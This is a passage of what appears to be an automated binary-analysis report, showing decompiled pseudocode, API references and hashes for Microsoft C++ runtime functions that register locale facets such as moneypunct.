																 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																 *(_t418 - 0x10) = _t403;
																_t191 = E6DDB161C(0x6de96d8c);
																_t327 =  *((intOrPtr*)(_t418 + 8));
																_t393 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t191);
																__eflags = _t393;
																if(_t393 != 0) {
																	L33:
																	E6DDD66BA(_t418 - 0x14);
																	return E6DDF0075(_t393);
																} else {
																	__eflags = _t403;
																	if(_t403 == 0) {
																		_push( *((intOrPtr*)(_t418 + 8)));
																		_push(_t418 - 0x10);
																		__eflags = E6DDE1471(_t296, _t327, _t387, _t393, _t403) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t418 - 0x20);
																			E6DDF3D74(_t418 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t296, _t393, _t403, 0x14);
																			E6DDD6653(_t418 - 0x14, 0);
																			_t404 =  *0x6de96dfc; // 0x0
																			 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																			 *(_t418 - 0x10) = _t404;
																			_t204 = E6DDB161C(0x6de96da8);
																			_t334 =  *((intOrPtr*)(_t418 + 8));
																			_t394 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t204);
																			__eflags = _t394;
																			if(_t394 != 0) {
																				L40:
																				E6DDD66BA(_t418 - 0x14);
																				return E6DDF0075(_t394);
																			} else {
																				__eflags = _t404;
																				if(_t404 == 0) {
																					_push( *((intOrPtr*)(_t418 + 8)));
																					_push(_t418 - 0x10);
																					__eflags = E6DDE14EC(_t296, _t334, _t387, _t394, _t404) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t418 - 0x20);
																						E6DDF3D74(_t418 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t296, _t394, _t404, 0x14);
																						E6DDD6653(_t418 - 0x14, 0);
																						_t405 =  *0x6de96dcc; // 0x0
																						 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																						 *(_t418 - 0x10) = _t405;
																						_t217 = E6DDB161C(0x6de96d80);
																						_t341 =  *((intOrPtr*)(_t418 + 8));
																						_t395 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t217);
																						__eflags = _t395;
																						if(_t395 != 0) {
																							L47:
																							E6DDD66BA(_t418 - 0x14);
																							return E6DDF0075(_t395);
																						} else {
																							__eflags = _t405;
																							if(_t405 == 0) {
																								_push( *((intOrPtr*)(_t418 + 8)));
																								_push(_t418 - 0x10);
																								__eflags = E6DDE1558(_t296, _t341, _t387, _t395, _t405) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t418 - 0x20);
																									E6DDF3D74(_t418 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t296, _t395, _t405, 0x14);
																									E6DDD6653(_t418 - 0x14, 0);
																									_t406 =  *0x6de96e00; // 0x0
																									 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																									 *(_t418 - 0x10) = _t406;
																									_t230 = E6DDB161C(0x6de96dac);
																									_t348 =  *((intOrPtr*)(_t418 + 8));
																									_t396 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t230);
																									__eflags = _t396;
																									if(_t396 != 0) {
																										L54:
																										E6DDD66BA(_t418 - 0x14);
																										return E6DDF0075(_t396);
																									} else {
																										__eflags = _t406;
																										if(_t406 == 0) {
																											_push( *((intOrPtr*)(_t418 + 8)));
																											_push(_t418 - 0x10);
																											__eflags = E6DDE15C4(_t296, _t348, _t387, _t396, _t406) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t418 - 0x20);
																												E6DDF3D74(_t418 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t296, _t396, _t406, 0x14);
																												E6DDD6653(_t418 - 0x14, 0);
																												_t407 =  *0x6de96dd0; // 0x0
																												 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																												 *(_t418 - 0x10) = _t407;
																												_t243 = E6DDB161C(0x6de96d60);
																												_t355 =  *((intOrPtr*)(_t418 + 8));
																												_t397 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t243);
																												__eflags = _t397;
																												if(_t397 != 0) {
																													L61:
																													E6DDD66BA(_t418 - 0x14);
																													return E6DDF0075(_t397);
																												} else {
																													__eflags = _t407;
																													if(_t407 == 0) {
																														_push( *((intOrPtr*)(_t418 + 8)));
																														_push(_t418 - 0x10);
																														__eflags = E6DDE162A(_t296, _t355, _t387, _t397, _t407) - 0xffffffff;
																														if(__eflags == 0) {
																															_t359 = _t418 - 0x20;
																															E6DDB1438(_t359);
																															E6DDF3D74(_t418 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de3851f, _t296, _t397, _t407, 4);
																															_t408 = _t359;
																															 *(_t418 - 0x10) = _t408;
																															 *((intOrPtr*)(_t408 + 4)) =  *((intOrPtr*)(_t418 + 0xc));
																															_push( *((intOrPtr*)(_t418 + 0x14)));
																															_t133 = _t418 - 4;
																															 *_t133 =  *(_t418 - 4) & 0x00000000;
																															__eflags =  *_t133;
																															 *_t408 = 0x6de3c0c4;
																															 *((char*)(_t408 + 0x28)) =  *((intOrPtr*)(_t418 + 0x10));
																															E6DDE542F(_t296, _t359, _t387, _t397, _t408,  *_t133);
																															return E6DDF0075(_t408,  *((intOrPtr*)(_t418 + 8)));
																														} else {
																															_t397 =  *(_t418 - 0x10);
																															 *(_t418 - 0x10) = _t397;
																															 *(_t418 - 4) = 1;
																															E6DDD6FD3(__eflags, _t397);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t397 + 4))))();
																															 *0x6de96dd0 = _t397;
																															goto L61;
																														}
																													} else {
																														_t397 = _t407;
																														goto L61;
																													}
																												}
																											} else {
																												_t396 =  *(_t418 - 0x10);
																												 *(_t418 - 0x10) = _t396;
																												 *(_t418 - 4) = 1;
																												E6DDD6FD3(__eflags, _t396);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t396 + 4))))();
																												 *0x6de96e00 = _t396;
																												goto L54;
																											}
																										} else {
																											_t396 = _t406;
																											goto L54;
																										}
																									}
																								} else {
																									_t395 =  *(_t418 - 0x10);
																									 *(_t418 - 0x10) = _t395;
																									 *(_t418 - 4) = 1;
																									E6DDD6FD3(__eflags, _t395);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t395 + 4))))();
																									 *0x6de96dcc = _t395;
																									goto L47;
																								}
																							} else {
																								_t395 = _t405;
																								goto L47;
																							}
																						}
																					} else {
																						_t394 =  *(_t418 - 0x10);
																						 *(_t418 - 0x10) = _t394;
																						 *(_t418 - 4) = 1;
																						E6DDD6FD3(__eflags, _t394);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t394 + 4))))();
																						 *0x6de96dfc = _t394;
																						goto L40;
																					}
																				} else {
																					_t394 = _t404;
																					goto L40;
																				}
																			}
																		} else {
																			_t393 =  *(_t418 - 0x10);
																			 *(_t418 - 0x10) = _t393;
																			 *(_t418 - 4) = 1;
																			E6DDD6FD3(__eflags, _t393);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t393 + 4))))();
																			 *0x6de96de0 = _t393;
																			goto L33;
																		}
																	} else {
																		_t393 = _t403;
																		goto L33;
																	}
																}
															} else {
																_t392 =  *(_t418 - 0x10);
																 *(_t418 - 0x10) = _t392;
																 *(_t418 - 4) = 1;
																E6DDD6FD3(__eflags, _t392);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t392 + 4))))();
																 *0x6de96ddc = _t392;
																goto L26;
															}
														} else {
															_t392 = _t402;
															goto L26;
														}
													}
												} else {
													_t391 =  *(_t418 - 0x10);
													 *(_t418 - 0x10) = _t391;
													 *(_t418 - 4) = 1;
													E6DDD6FD3(__eflags, _t391);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t391 + 4))))();
													 *0x6de96db0 = _t391;
													goto L19;
												}
											} else {
												_t391 = _t401;
												goto L19;
											}
										}
									} else {
										_t390 =  *(_t418 - 0x10);
										 *(_t418 - 0x10) = _t390;
										 *(_t418 - 4) = 1;
										E6DDD6FD3(__eflags, _t390);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t390 + 4))))();
										 *0x6de96dd8 = _t390;
										goto L12;
									}
								} else {
									_t390 = _t400;
									goto L12;
								}
							}
						} else {
							_t389 =  *(_t418 - 0x10);
							 *(_t418 - 0x10) = _t389;
							 *(_t418 - 4) = 1;
							E6DDD6FD3(__eflags, _t389);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t389 + 4))))();
							 *0x6de96dc4 = _t389;
							goto L5;
						}
					} else {
						_t389 = _t399;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF760
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF76A
int.LIBCPMT ref: 6DDDF781

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

moneypunct.LIBCPMT ref: 6DDDF7A4
std::_Facet_Register.LIBCPMT ref: 6DDDF7BB
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF7DB
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF7F9

Strings

xmm, xrefs: 6DDDF775

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID: xmm
API String ID: 113178234-359119008
Opcode ID: e835051401264cb08cd920fd5d167854c39ff1856e9b86a0c8193f169a26d760
Instruction ID: 4649a11f95f179ccca7485d4ff20ee24cface9f090afb8d263b33e5ec7f1b258
Opcode Fuzzy Hash: e835051401264cb08cd920fd5d167854c39ff1856e9b86a0c8193f169a26d760
Instruction Fuzzy Hash: 3511C275909119DBCF01FBA4C844AFDB7B4AF54318F264009F521AB290DF74DA05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF6B3, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDDF6B3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t153;
				signed int _t154;
				void* _t166;
				void* _t179;
				void* _t192;
				void* _t205;
				void* _t218;
				void* _t231;
				void* _t244;
				void* _t257;
				void* _t270;
				signed int _t397;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				void* _t462;

				_t428 = __edx;
				_t327 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t462 - 0x14, 0);
				_t441 =  *0x6de96dc8; // 0x0
				 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
				 *(_t462 - 0x10) = _t441;
				_t153 = E6DDB161C(0x6de96d7c);
				_t330 =  *((intOrPtr*)(_t462 + 8));
				_t154 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t153);
				_t430 = _t154;
				if(_t154 != 0) {
					L5:
					E6DDD66BA(_t462 - 0x14);
					return E6DDF0075(_t430);
				} else {
					if(_t441 == 0) {
						_push( *((intOrPtr*)(_t462 + 8)));
						_push(_t462 - 0x10);
						__eflags = E6DDE1230(__ebx, _t330, __edx, _t430, _t441) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t462 - 0x20);
							E6DDF3D74(_t462 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t430, _t441, 0x14);
							E6DDD6653(_t462 - 0x14, 0);
							_t442 =  *0x6de96dc4; // 0x0
							 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
							 *(_t462 - 0x10) = _t442;
							_t166 = E6DDB161C(0x6de96d78);
							_t337 =  *((intOrPtr*)(_t462 + 8));
							_t431 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t166);
							__eflags = _t431;
							if(_t431 != 0) {
								L12:
								E6DDD66BA(_t462 - 0x14);
								return E6DDF0075(_t431);
							} else {
								__eflags = _t442;
								if(_t442 == 0) {
									_push( *((intOrPtr*)(_t462 + 8)));
									_push(_t462 - 0x10);
									__eflags = E6DDE12B4(_t327, _t337, __edx, _t431, _t442) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t462 - 0x20);
										E6DDF3D74(_t462 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t327, _t431, _t442, 0x14);
										E6DDD6653(_t462 - 0x14, 0);
										_t443 =  *0x6de96dd8; // 0x0
										 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
										 *(_t462 - 0x10) = _t443;
										_t179 = E6DDB161C(0x6de96d84);
										_t344 =  *((intOrPtr*)(_t462 + 8));
										_t432 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t179);
										__eflags = _t432;
										if(_t432 != 0) {
											L19:
											E6DDD66BA(_t462 - 0x14);
											return E6DDF0075(_t432);
										} else {
											__eflags = _t443;
											if(_t443 == 0) {
												_push( *((intOrPtr*)(_t462 + 8)));
												_push(_t462 - 0x10);
												__eflags = E6DDE1339(_t327, _t344, __edx, _t432, _t443) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t462 - 0x20);
													E6DDF3D74(_t462 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t327, _t432, _t443, 0x14);
													E6DDD6653(_t462 - 0x14, 0);
													_t444 =  *0x6de96db0; // 0x0
													 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
													 *(_t462 - 0x10) = _t444;
													_t192 = E6DDB161C(0x6de96d64);
													_t351 =  *((intOrPtr*)(_t462 + 8));
													_t433 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t192);
													__eflags = _t433;
													if(_t433 != 0) {
														L26:
														E6DDD66BA(_t462 - 0x14);
														return E6DDF0075(_t433);
													} else {
														__eflags = _t444;
														if(_t444 == 0) {
															_push( *((intOrPtr*)(_t462 + 8)));
															_push(_t462 - 0x10);
															__eflags = E6DDE13A1(_t327, _t351, _t428, _t433, _t444) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t462 - 0x20);
																E6DDF3D74(_t462 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t327, _t433, _t444, 0x14);
																E6DDD6653(_t462 - 0x14, 0);
																_t445 =  *0x6de96ddc; // 0x0
																 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																 *(_t462 - 0x10) = _t445;
																_t205 = E6DDB161C(0x6de96d88);
																_t358 =  *((intOrPtr*)(_t462 + 8));
																_t434 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t205);
																__eflags = _t434;
																if(_t434 != 0) {
																	L33:
																	E6DDD66BA(_t462 - 0x14);
																	return E6DDF0075(_t434);
																} else {
																	__eflags = _t445;
																	if(_t445 == 0) {
																		_push( *((intOrPtr*)(_t462 + 8)));
																		_push(_t462 - 0x10);
																		__eflags = E6DDE1409(_t327, _t358, _t428, _t434, _t445) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t462 - 0x20);
																			E6DDF3D74(_t462 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t327, _t434, _t445, 0x14);
																			E6DDD6653(_t462 - 0x14, 0);
																			_t446 =  *0x6de96de0; // 0x0
																			 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																			 *(_t462 - 0x10) = _t446;
																			_t218 = E6DDB161C(0x6de96d8c);
																			_t365 =  *((intOrPtr*)(_t462 + 8));
																			_t435 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t218);
																			__eflags = _t435;
																			if(_t435 != 0) {
																				L40:
																				E6DDD66BA(_t462 - 0x14);
																				return E6DDF0075(_t435);
																			} else {
																				__eflags = _t446;
																				if(_t446 == 0) {
																					_push( *((intOrPtr*)(_t462 + 8)));
																					_push(_t462 - 0x10);
																					__eflags = E6DDE1471(_t327, _t365, _t428, _t435, _t446) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t462 - 0x20);
																						E6DDF3D74(_t462 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t327, _t435, _t446, 0x14);
																						E6DDD6653(_t462 - 0x14, 0);
																						_t447 =  *0x6de96dfc; // 0x0
																						 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																						 *(_t462 - 0x10) = _t447;
																						_t231 = E6DDB161C(0x6de96da8);
																						_t372 =  *((intOrPtr*)(_t462 + 8));
																						_t436 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t231);
																						__eflags = _t436;
																						if(_t436 != 0) {
																							L47:
																							E6DDD66BA(_t462 - 0x14);
																							return E6DDF0075(_t436);
																						} else {
																							__eflags = _t447;
																							if(_t447 == 0) {
																								_push( *((intOrPtr*)(_t462 + 8)));
																								_push(_t462 - 0x10);
																								__eflags = E6DDE14EC(_t327, _t372, _t428, _t436, _t447) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t462 - 0x20);
																									E6DDF3D74(_t462 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t327, _t436, _t447, 0x14);
																									E6DDD6653(_t462 - 0x14, 0);
																									_t448 =  *0x6de96dcc; // 0x0
																									 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																									 *(_t462 - 0x10) = _t448;
																									_t244 = E6DDB161C(0x6de96d80);
																									_t379 =  *((intOrPtr*)(_t462 + 8));
																									_t437 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t244);
																									__eflags = _t437;
																									if(_t437 != 0) {
																										L54:
																										E6DDD66BA(_t462 - 0x14);
																										return E6DDF0075(_t437);
																									} else {
																										__eflags = _t448;
																										if(_t448 == 0) {
																											_push( *((intOrPtr*)(_t462 + 8)));
																											_push(_t462 - 0x10);
																											__eflags = E6DDE1558(_t327, _t379, _t428, _t437, _t448) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t462 - 0x20);
																												E6DDF3D74(_t462 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t327, _t437, _t448, 0x14);
																												E6DDD6653(_t462 - 0x14, 0);
																												_t449 =  *0x6de96e00; // 0x0
																												 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																												 *(_t462 - 0x10) = _t449;
																												_t257 = E6DDB161C(0x6de96dac);
																												_t386 =  *((intOrPtr*)(_t462 + 8));
																												_t438 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t257);
																												__eflags = _t438;
																												if(_t438 != 0) {
																													L61:
																													E6DDD66BA(_t462 - 0x14);
																													return E6DDF0075(_t438);
																												} else {
																													__eflags = _t449;
																													if(_t449 == 0) {
																														_push( *((intOrPtr*)(_t462 + 8)));
																														_push(_t462 - 0x10);
																														__eflags = E6DDE15C4(_t327, _t386, _t428, _t438, _t449) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t462 - 0x20);
																															E6DDF3D74(_t462 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t327, _t438, _t449, 0x14);
																															E6DDD6653(_t462 - 0x14, 0);
																															_t450 =  *0x6de96dd0; // 0x0
																															 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																															 *(_t462 - 0x10) = _t450;
																															_t270 = E6DDB161C(0x6de96d60);
																															_t393 =  *((intOrPtr*)(_t462 + 8));
																															_t439 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t270);
																															__eflags = _t439;
																															if(_t439 != 0) {
																																L68:
																																E6DDD66BA(_t462 - 0x14);
																																return E6DDF0075(_t439);
																															} else {
																																__eflags = _t450;
																																if(_t450 == 0) {
																																	_push( *((intOrPtr*)(_t462 + 8)));
																																	_push(_t462 - 0x10);
																																	__eflags = E6DDE162A(_t327, _t393, _t428, _t439, _t450) - 0xffffffff;
																																	if(__eflags == 0) {
																																		_t397 = _t462 - 0x20;
																																		E6DDB1438(_t397);
																																		E6DDF3D74(_t462 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de3851f, _t327, _t439, _t450, 4);
																																		_t451 = _t397;
																																		 *(_t462 - 0x10) = _t451;
																																		 *((intOrPtr*)(_t451 + 4)) =  *((intOrPtr*)(_t462 + 0xc));
																																		_push( *((intOrPtr*)(_t462 + 0x14)));
																																		_t147 = _t462 - 4;
																																		 *_t147 =  *(_t462 - 4) & 0x00000000;
																																		__eflags =  *_t147;
																																		 *_t451 = 0x6de3c0c4;
																																		 *((char*)(_t451 + 0x28)) =  *((intOrPtr*)(_t462 + 0x10));
																																		E6DDE542F(_t327, _t397, _t428, _t439, _t451,  *_t147);
																																		return E6DDF0075(_t451,  *((intOrPtr*)(_t462 + 8)));
																																	} else {
																																		_t439 =  *(_t462 - 0x10);
																																		 *(_t462 - 0x10) = _t439;
																																		 *(_t462 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t439);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t439 + 4))))();
																																		 *0x6de96dd0 = _t439;
																																		goto L68;
																																	}
																																} else {
																																	_t439 = _t450;
																																	goto L68;
																																}
																															}
																														} else {
																															_t438 =  *(_t462 - 0x10);
																															 *(_t462 - 0x10) = _t438;
																															 *(_t462 - 4) = 1;
																															E6DDD6FD3(__eflags, _t438);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t438 + 4))))();
																															 *0x6de96e00 = _t438;
																															goto L61;
																														}
																													} else {
																														_t438 = _t449;
																														goto L61;
																													}
																												}
																											} else {
																												_t437 =  *(_t462 - 0x10);
																												 *(_t462 - 0x10) = _t437;
																												 *(_t462 - 4) = 1;
																												E6DDD6FD3(__eflags, _t437);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t437 + 4))))();
																												 *0x6de96dcc = _t437;
																												goto L54;
																											}
																										} else {
																											_t437 = _t448;
																											goto L54;
																										}
																									}
																								} else {
																									_t436 =  *(_t462 - 0x10);
																									 *(_t462 - 0x10) = _t436;
																									 *(_t462 - 4) = 1;
																									E6DDD6FD3(__eflags, _t436);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t436 + 4))))();
																									 *0x6de96dfc = _t436;
																									goto L47;
																								}
																							} else {
																								_t436 = _t447;
																								goto L47;
																							}
																						}
																					} else {
																						_t435 =  *(_t462 - 0x10);
																						 *(_t462 - 0x10) = _t435;
																						 *(_t462 - 4) = 1;
																						E6DDD6FD3(__eflags, _t435);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t435 + 4))))();
																						 *0x6de96de0 = _t435;
																						goto L40;
																					}
																				} else {
																					_t435 = _t446;
																					goto L40;
																				}
																			}
																		} else {
																			_t434 =  *(_t462 - 0x10);
																			 *(_t462 - 0x10) = _t434;
																			 *(_t462 - 4) = 1;
																			E6DDD6FD3(__eflags, _t434);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t434 + 4))))();
																			 *0x6de96ddc = _t434;
																			goto L33;
																		}
																	} else {
																		_t434 = _t445;
																		goto L33;
																	}
																}
															} else {
																_t433 =  *(_t462 - 0x10);
																 *(_t462 - 0x10) = _t433;
																 *(_t462 - 4) = 1;
																E6DDD6FD3(__eflags, _t433);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t433 + 4))))();
																 *0x6de96db0 = _t433;
																goto L26;
															}
														} else {
															_t433 = _t444;
															goto L26;
														}
													}
												} else {
													_t432 =  *(_t462 - 0x10);
													 *(_t462 - 0x10) = _t432;
													 *(_t462 - 4) = 1;
													E6DDD6FD3(__eflags, _t432);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t432 + 4))))();
													 *0x6de96dd8 = _t432;
													goto L19;
												}
											} else {
												_t432 = _t443;
												goto L19;
											}
										}
									} else {
										_t431 =  *(_t462 - 0x10);
										 *(_t462 - 0x10) = _t431;
										 *(_t462 - 4) = 1;
										E6DDD6FD3(__eflags, _t431);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t431 + 4))))();
										 *0x6de96dc4 = _t431;
										goto L12;
									}
								} else {
									_t431 = _t442;
									goto L12;
								}
							}
						} else {
							_t430 =  *(_t462 - 0x10);
							 *(_t462 - 0x10) = _t430;
							 *(_t462 - 4) = 1;
							E6DDD6FD3(__eflags, _t430);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t430 + 4))))();
							 *0x6de96dc8 = _t430;
							goto L5;
						}
					} else {
						_t430 = _t441;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF6BA
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF6C4
int.LIBCPMT ref: 6DDDF6DB

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

moneypunct.LIBCPMT ref: 6DDDF6FE
std::_Facet_Register.LIBCPMT ref: 6DDDF715
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF735
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF753

Strings

|mm, xrefs: 6DDDF6CF

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID: |mm
API String ID: 113178234-2398550710
Opcode ID: 8c7e4f039575384d17dfd30c42ce0945d7013e064f679a1a90bb3da8df4cdd83
Instruction ID: cee5503f70c73b35fcba8a2d9db0ea0da376db1286e34c82d85a95dcc00c96cd
Opcode Fuzzy Hash: 8c7e4f039575384d17dfd30c42ce0945d7013e064f679a1a90bb3da8df4cdd83
Instruction Fuzzy Hash: B911C275908559EBCF01FBA4C840AFDB7B4AF84318F260009F521AB290DF74DA05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF0DD, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF0DD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t279;
				signed int _t280;
				void* _t292;
				void* _t305;
				void* _t318;
				void* _t331;
				void* _t344;
				void* _t357;
				void* _t370;
				void* _t383;
				void* _t396;
				void* _t409;
				void* _t422;
				void* _t435;
				void* _t448;
				void* _t461;
				void* _t474;
				void* _t487;
				void* _t500;
				void* _t513;
				signed int _t739;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				signed int _t829;
				signed int _t830;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				void* _t858;

				_t797 = __edx;
				_t606 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t858 - 0x14, 0);
				_t819 =  *0x6de96dd4; // 0x0
				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
				 *(_t858 - 0x10) = _t819;
				_t279 = E6DDB161C(0x6de96b28);
				_t609 =  *((intOrPtr*)(_t858 + 8));
				_t280 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t279);
				_t799 = _t280;
				if(_t280 != 0) {
					L5:
					E6DDD66BA(_t858 - 0x14);
					return E6DDF0075(_t799);
				} else {
					if(_t819 == 0) {
						_push( *((intOrPtr*)(_t858 + 8)));
